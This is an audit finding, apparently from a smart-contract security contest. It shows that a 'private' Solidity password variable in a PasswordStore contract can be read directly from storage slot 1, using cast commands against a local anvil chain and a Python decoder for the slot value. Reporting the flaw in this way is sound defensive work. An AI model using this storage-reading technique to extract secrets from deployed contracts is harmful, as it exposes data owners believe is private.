Submission Details
Severity: high
Valid

External observers can view value of password

Summary

External observers can view the value of s_Password by querying the world state or storage address holding s_Password

Vulnerability Details

Although s_Password is declared private, that does not stop external users from querying its value. The private keyword only prevents other contracts from accessing or modifying the variable; it does not hide the data on chain. The value of s_Password can be obtained by reading the storage slots of the contract directly.

In this contract s_Password is stored in storage slot 1. After deploying the contract, if you query storage slot 1 and convert the hex value retrieved, you can recover the password without interacting with the contract itself.

The following proof of concept deploys the contract onto a local anvil chain, then uses cast to retrieve storage slot 1 at the address returned by the deploy script, and finally converts that hex to plaintext, displaying the password.

Proof of Concept:

$make anvil
$make deploy
== Return ==
0: contract PasswordStore 0x5FbDB2315678afecb367f032d93F642f64180aa3

$cast storage 0x5FbDB2315678afecb367f032d93F642f64180aa3 1
0x6d7950617373776f726400000000000000000000000000000000000000000014

$cast to-ascii "0x6d7950617373776f726400000000000000000000000000000000000000000014"
myPassword
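The slot value above is decoded here the way the Solidity compiler lays out a string in storage (an added example, not part of the submission): short strings keep their bytes left-aligned with 2*length in the last byte, so the trailing 0x14 is a length marker rather than part of the password, and a long string would instead flag the slot and keep its bytes elsewhere.

```python
# Decode a Solidity `string` storage slot into its plaintext.
# Short strings (< 32 bytes): bytes left-aligned in the slot, lowest byte = 2*len.
# Long strings (>= 32 bytes): the slot holds 2*len + 1 (low bit set) and the
# data lives at keccak256(slot) onward, so it is not recoverable from this word.
# The sample slot value below is the one returned by `cast storage` in the PoC.

def decode_string_slot(slot_hex: str) -> str:
    word = bytes.fromhex(slot_hex.removeprefix("0x").zfill(64))
    if len(word) != 32:
        raise ValueError("expected a 32-byte storage word")
    marker = word[-1]
    if marker & 1:
        # Long-string encoding: only the length is in this slot.
        length = (int.from_bytes(word, "big") - 1) // 2
        raise ValueError(f"long string of {length} bytes; data is at keccak256(slot)")
    length = marker // 2
    if length > 31:
        raise ValueError("short-string length marker out of range")
    return word[:length].decode("utf-8")


SLOT_1 = "0x6d7950617373776f726400000000000000000000000000000000000000000014"

if __name__ == "__main__":
    print(decode_string_slot(SLOT_1))  # prints "myPassword"
```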

Impact

High - Anyone can read the password and owner may erroneously assume it is secret

Tools Used

Foundry, Solidity Visual Developer, VS Code

Recommendations

Assume that the password can be viewed at all times. The password can be stored as some other representation such as a hash. Another option is to store a meaningful word or phrase that can remind you of the real password.

Updates

Lead Judging Commences

inallhonesty Lead Judge almost 2 years ago
Submission Judgement Published
Validated
Assigned finding tags:

finding-anyone-can-read-storage

Private functions and state variables are only visible for the contract they are defined in and not in derived contracts. In this case private doesn't mean secret/confidential.
